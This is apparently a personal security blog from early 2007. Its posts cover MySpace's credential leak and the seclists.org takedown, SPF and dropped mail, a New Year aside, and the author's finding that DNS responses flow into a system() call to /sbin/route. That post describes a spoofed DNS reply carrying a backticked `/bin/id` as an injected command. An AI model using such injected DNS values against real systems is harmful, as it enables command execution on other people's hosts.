Friday, January 26, 2007

MySpace, GoDaddy, nmap and snails

I woke up a bit early this morning and began my usual routine of feeding while I checked email, read various news bits, etc. I ran into an article on reddit about GoDaddy having to shut down a site after myspace.com complained. This alone didn't catch my attention as this sort of thing happens probably hundreds of times per day.

As the caffeine started to flow, I read further into the article. I saw that the site that got shutdown was seclists.org. That site rang a bell. I read further and realized that seclists is owned by Fyodor, the author of nmap, which is arguably one of the most important utilities in a security geek's arsenal. I nearly choked on my granola when everything finally clicked.

I don't use GoDaddy, but it made me realize that I should probably avoid GoDaddy in the future, and that many people in similarly edgy shoes will probably do the same.

What gets me most about this whole fiasco is not the fact that MySpace can throw its weight around and get a site axed, nor the fact that it happened to a fairly well-known individual. Its the fact that the data in question was first made public on another site over a week ago. My cat, who is barely 10 months old, has ADHD, is a vicious killer, and knows nothing other than how to sleep, eat, shit, cause trouble and get attention, could've addressed a security issue like this quicker than MySpace did. We aren't talking about a few passwords here, either. We are talking about over 56,000 myspace credentials and a password stealing scheme that was extremely effective.

The security staff (if any :P) at myspace should be ashamed.

Monday, January 15, 2007

Dropped mail?

I figured I'd throw this out there hoping that some of the 3.4 people that read this blog may have some insight.

I've owned the spoofed.org domain since 2001. While I can't guarantee it, I have every reason to believe that the machine(s) used to host it have never been involved in any sort of mass-mailing, virus spewing, or other things that tend to cause mail to get dropped.

Over the past, oh... 6 months, I've seen a number of instances where mail coming from spoofed.org has been dropped for one reason or another. In some cases, my email was in reply to one that someone else sent. When they never got my response, they asked why, but I've got logs saying that the email was successfully delivered. In some cases (yahoo.com and hotmail.com being good examples), mail would get delivered successfully but dropped in a spam folder, which in the end means it'll go unread and eventually be deleted. In other cases, I'd initiate or respond to an email and never get a response but I know the person on the other end would've responded had they received my email.

Like anyone thats ever posted to a public mailing list, my email address(es) and domain have been used plenty of times as part of forged spam or other nastiness. Thats a risk I accept, as really its just life on the Internet. But I can't help but wonder why my mail gets treated like garbage and all too often dropped.

I know at one point yahoo.com and hotmail.com were making heavy use of SPF, so I recently configured an SPF record for spoofed.org:

$  host -t txt spoofed.org
spoofed.org          TXT "v=spf1 a mx  ptr -all"

If anyone has any suggestions for things I could do (or not do...) to prevent my mail from getting dropped or otherwise demoted, please leave a comment here. Feel free to poke around, too. Examine my DNS setup and my postfix configuration. I believe it all to be sane, but I could be wrong and would love to have that proven.

Thanks in advance!

Tuesday, January 2, 2007

Can't see the forest for the trees

Yesterday was perhaps the laziest day I've had in quite some time, but it was worth it. I woke up at 10ish and spent the remainder of the day planted in front of my laptop hacking. Come midnight I realized that the ROI on my time was diminishing.

My challenge for the day was much like many of the other security adventures I've been on in the past few years -- something catches my eye, and I pursue it. This particular trait has proven quite useful in my pursuit of security success, but it is actually one that I acquired long before even owned my own computer -- and I mean "own" as in "it belonds to me", not "0wn". Growing up I spent the bulk of my time outdoors doing various things -- riding my bikes, camping, fishing, hiking, etc. For whatever reason, I had this ability to, without even trying, discover misplaced/lost belongings. As an example, on camping trips with the scouts, I'd routinely be walking along, doing whatever it was needed to be done at the time, and I'd see a silouhette or something that otherwise stood out ever so slightly. It would usually turn out to be a watch, a flashlight, or other outdoor goody. Eventually it got to the point that other people would actually suspect I was stealing these things or they'd get pissed off at me because I would always find these treasures that would've otherwise gone unnoticed.

Yesterdays challenge was something that I had casually noticed in a packet capture several days earlier -- a DNS request for the hostname 'netmask'.

The first several hours were spent verifying that the request had, in fact, come from what application I thought it came from, and then determining what, in particular, had made that request. Eventually I realized that what I was up against was a call to system("/sbin/route somestuffhere"), where somestuffhere was taken in part from a DNS response.

After a quick POC with Dug Song's dnsspoof, I knew I could manipulate that call, but dnsspoof only does simple A record responses, so all I could wind up doing was getting /sbin/route to do something funky with this particular call. While that is certainly a vulnerability all by itself, it wasn't quite what I was looking for. Its like fishing -- it was a nice catch, but there is something bigger/better out there. I debated hacking up dnsspoof to do my bidding, but that quickly proved to be more C than I had time for. I whipped up some perl that did exactly what dnsspoof did, and then modified it to do my bidding. It will respond to regex-matched DNS A record lookups with arbitrary records -- A, CNAME, MX, etc, that you define. Doing an nslookup lookup on google.com and getting back a TXT record of `/bin/id` is quite amusing.

Anyway, I'm finalizing this code and hope to make it available very soon.

Happy 0x7d7

So, rumor has it that it is now the year twenty o-seven. Personally, I'm still not even sure Christmast happened, because I know that I spent all of yesterday in just shorts and the heat wasn't on, and on what was supposedly the last day of 2006, I rode my bike outside and sweat my ass off. On the East Coast, that just doesn't happen.

A funny thing happened at work today. I was filling out paperwork for vacation and mistakenly put today as 1/2/2006, and all of my other dates were also off by one year. This sort of thing happens to just about everyone at least once this time of year. In thinking about why it happens, I realized that a large part of this is due to the fact in today's society, you rarely actually write the date down. At least 75% of the time its just automatically entered for you -- email, calendars, etc. Plus, when you actually need to know what today's date is, how often do you actually think it out instead of asking someone/something for the answer. In the computer world, the date is automatically printed in my zsh prompt, and if I need to know a specific date, cal tells me the rest. In the real world, say at the grocery store, you always ask the cashier what the date is.

Anyway, here's hoping 2007 is as eventfully uneventful as 2006.